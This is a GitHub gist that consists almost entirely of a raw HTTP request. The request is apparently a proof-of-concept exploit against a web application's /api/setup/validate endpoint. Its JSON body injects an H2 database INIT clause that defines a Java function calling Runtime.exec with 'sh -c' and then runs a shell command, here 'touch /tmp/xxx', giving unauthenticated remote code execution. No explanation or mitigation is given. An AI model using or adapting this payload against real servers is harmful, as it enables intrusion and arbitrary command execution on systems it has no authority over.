Created
July 28, 2023 02:11
-
-
Save testanull/a7beb2777bbf550f3cf533d2794477fe to your computer and use it in GitHub Desktop.
Revisions
-
testanull created this gist
Jul 28, 2023 .There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -0,0 +1,12 @@ POST /api/setup/validate HTTP/1.1 Host: localhost:3000 Content-Length: 416 Accept: application/json Content-Type: application/json User-Agent: Mozilla/5.0 Connection: close {"token":"d66c72f1-ddf7-4d55-aaff-53ffbd4fbb7b","details":{"details":{ "subprotocol":"h2", "classname":"org.h2.Driver","advanced-options":true, "subname":"mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=CREATE ALIAS SHELLEXEC AS $$ void shellexec(String cmd) throws java.io.IOException {Runtime.getRuntime().exec(new String[]{\"sh\", \"-c\", cmd})\\;}$$\\;CALL SHELLEXEC('touch /tmp/xxx');"},"name":"x","engine":"postgres"}}